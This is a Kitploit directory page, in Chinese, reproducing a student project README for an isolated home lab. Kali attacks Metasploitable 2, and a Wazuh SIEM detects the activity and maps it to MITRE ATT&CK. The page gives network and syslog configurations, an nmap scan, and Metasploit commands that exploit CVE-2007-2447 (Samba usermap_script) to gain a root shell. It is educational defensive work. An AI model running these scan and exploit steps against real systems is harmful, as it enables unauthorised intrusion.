Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cybersecurity-home-lab-btp — 隔离的AD/Linux攻击实验室:通过Metasploit利用CVE-2007-2447,使用Wazuh SIEM检测并映射到MITRE ATT&CK(T1190, T1059) | Kitploit
工具/GitHubGitHub/harshiys/cybersecurity-home-lab-btp
权限提升侦察漏洞扫描器漏洞利用框架漏洞利用CTF渗透测试入侵检测学习与教育实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubharshiys/cybersecurity-home-lab-btp

cybersecurity-home-lab-btp

隔离的AD/Linux攻击实验室:通过Metasploit利用CVE-2007-2447,使用Wazuh SIEM检测并映射到MITRE ATT&CK(T1190, T1059)

查看仓库
5天前尚未审核

🛡️ 网络安全家庭实验室 — 检测与监控

学士学位项目 (BTP) | IIIT Pune 基于:"设计和实施一个有效的网络安全家庭实验室用于检测和监控" — ICCCNT 2023, IIT Delhi

一个完全功能化的网络安全家庭实验室,构建在单台机器上,使用免费开源工具。该实验室模拟真实攻击生命周期 — 侦察 → 利用 → 检测 — 并展示 SIEM 如何实时检测攻击并将其映射到 MITRE ATT&CK 框架。


📐 实验室架构

root@kitploit:~
┌─────────────────────────────────────────────────┐
│           VirtualBox — Internal Network          │
│              (cyberlab, 10.0.0.x/24)             │
│                                                  │
│  ┌──────────┐   ┌──────────────┐   ┌──────────┐ │
│  │  Kali    │   │ Metasploitable│  │  Ubuntu  │ │
│  │ 10.0.0.1 │◄─►│   10.0.0.2   │◄─►│ 10.0.0.3 │ │
│  │ ATTACKER │   │    VICTIM     │  │   SIEM   │ │
│  └──────────┘   └──────────────┘   └──────────┘ │
└─────────────────────────────────────────────────┘
         Host-Only Adapter (192.168.56.103)
         → Wazuh Dashboard access from browser
VM角色IP工具
Kali Linux 2026.1攻击者10.0.0.1Nmap, Metasploit
Metasploitable 2受害者10.0.0.220+ 漏洞
Ubuntu 22.04 + WazuhSIEM10.0.0.3Wazuh v4.7.5

🧰 工具与技术


🔧 设置指南

前提条件

  • 至少 16 GB RAM 的机器(3台虚拟机同时运行)
  • 已安装 VirtualBox 7.x
  • 约 50 GB 空闲磁盘空间

步骤 1 — VirtualBox 中的网络设置

在 VirtualBox 中创建一个名为 cyberlab 的 内部网络。所有三台虚拟机都使用此适配器。Ubuntu/Wazuh 虚拟机额外使用一个 仅主机适配器,以便您可以从浏览器访问仪表板。


步骤 2 — Kali Linux(攻击者)

  1. 下载 Kali Linux VirtualBox 镜像
  2. 导入并分配 cyberlab 内部网络适配器
  3. 设置静态 IP:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.1
    netmask 255.255.255.0
  1. 重启网络:sudo systemctl restart networking

步骤 3 — Metasploitable 2(受害者)

  1. 下载 Metasploitable 2
  2. 导入 VirtualBox,分配 cyberlab 网络
  3. 设置静态 IP:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.2
    netmask 255.255.255.0

⚠️ 切勿将 Metasploitable 2 暴露到互联网。 它故意存在安全隐患。


步骤 4 — Ubuntu + Wazuh SIEM(防御者)

  1. 安装 Ubuntu Server 22.04
  2. 分配两个适配器:cyberlab 内部网络 + 仅主机
  3. 通过 netplan(/etc/netplan/01-network-manager-all.yaml)配置静态 IP:
root@kitploit:~
network:
  version: 2
  renderer: NetworkManager
  ethernets:
    enp0s3:
      addresses:
        - 10.0.0.3/24
    enp0s8:
      dhcp4: true
  1. 安装 Wazuh(单节点):
root@kitploit:~
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
  1. 访问仪表板:https://192.168.56.103(从宿主机浏览器)

步骤 5 — 通过 Syslog 将 Metasploitable 连接到 Wazuh

由于 Metasploitable 2 无法运行 Wazuh 代理,配置 syslog 转发 实现无代理监控:

在 Metasploitable 上,添加至 /etc/rsyslog.conf:

root@kitploit:~
*.* @10.0.0.3:514

在 Wazuh(Ubuntu)上,启用 /var/ossec/etc/ossec.conf 中的 syslog 输入:

root@kitploit:~
<remote>
  <connection>syslog</connection>
  <port>514</port>
  <protocol>udp</protocol>
</remote>

重启 Wazuh:sudo systemctl restart wazuh-manager


⚔️ 攻击模拟

阶段 1 — 侦察(Nmap)

root@kitploit:~
# From Kali
nmap -sV -O 10.0.0.2

在 Metasploitable 2 上发现的关键服务:

发现 20+ 开放端口。操作系统指纹识别:Linux 2.6.x


阶段 2 — 利用(Metasploit)

漏洞: CVE-2007-2447 — Samba usermap_script 命令注入

允许通过 Samba 3.0.0–3.0.25rc3 上格式错误的 MS-RPC 请求进行未经身份验证的远程代码执行。

root@kitploit:~
# From Kali — launch Metasploit
msfconsole

# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run

# Verify root access
whoami
# Output: root

阶段 3 — 检测(Wazuh SIEM)

漏洞利用后,Wazuh 自动检测并将事件映射到 MITRE ATT&CK:

检测到的事件总数:55+

访问仪表板 https://192.168.56.103 → 安全事件 → MITRE ATT&CK


📊 关键结果

  • ✅ 成功在隔离环境中复现完整攻击生命周期
  • ✅ CVE-2007-2447 在数秒内获得未经身份验证的 root shell
  • ✅ Wazuh SIEM 实时检测并将所有攻击映射到 MITRE ATT&CK
  • ✅ Syslog 转发实现对老旧 Metasploitable 系统的无代理监控
  • ✅ 整个实验室在一台 16 GB RAM 的主机上运行

📁 仓库结构

root@kitploit:~
cybersecurity-home-lab/
│
├── README.md                  ← 你在这里
├── network-config/
│   ├── kali-interfaces.txt    ← Kali 静态 IP 配置
│   ├── metasploitable-interfaces.txt
│   └── ubuntu-netplan.yaml    ← Ubuntu/SIEM netplan 配置
├── wazuh-config/
│   └── ossec.conf             ← Wazuh syslog/agent 配置
├── screenshots/
│   ├── nmap-scan.png
│   ├── metasploit-exploit.png
│   ├── wazuh-dashboard.png
│   └── wazuh-alerts-table.png
└── report/
    └── ICCCNT_2023_paper.pdf  ← 参考研究论文

🔗 参考文献

Dadiyala, C. 等 (2023). 设计和实施一个有效的网络安全家庭实验室用于检测和监控. 第14届计算、通信与网络技术国际会议 (ICCCNT), IIT Delhi. IEEE-56998.


⚠️ 免责声明

本实验室完全构建在隔离的虚拟机上,攻击模拟期间无互联网访问。所有工具和技术仅在受控环境中用于教育目的。请勿在您未拥有或未经明确许可的系统上尝试复制任何攻击技术。


由 Harshita Verma 呈现 | IIIT Pune

下载工具
工具版本用途
VirtualBox7.x虚拟机监控程序 — 在一台主机上运行所有虚拟机
Kali Linux2026.1渗透测试操作系统(攻击方)
Metasploitable 2v2.0故意存在漏洞的目标
Wazuhv4.7.5开源SIEM(防御方)
Nmap最新版网络/端口扫描
Metasploit Framework最新版漏洞利用框架
端口服务版本
21/tcpFTPvsftpd 2.3.4
22/tcpSSHOpenSSH 4.7p1
80/tcpHTTPApache 2.2.8
139/445SMBSamba 3.x–4.x
3306/tcpMySQL5.0.51a
5432/tcpPostgreSQL8.3
规则 ID描述MITRE 技术战术
5402成功执行 sudo 到 ROOTT1548.003权限提升
5501PAM:登录会话已打开T1078初始访问 / 持久化
5502PAM:登录会话已关闭T1078防御规避
502Wazuh 服务器已启动—检测活动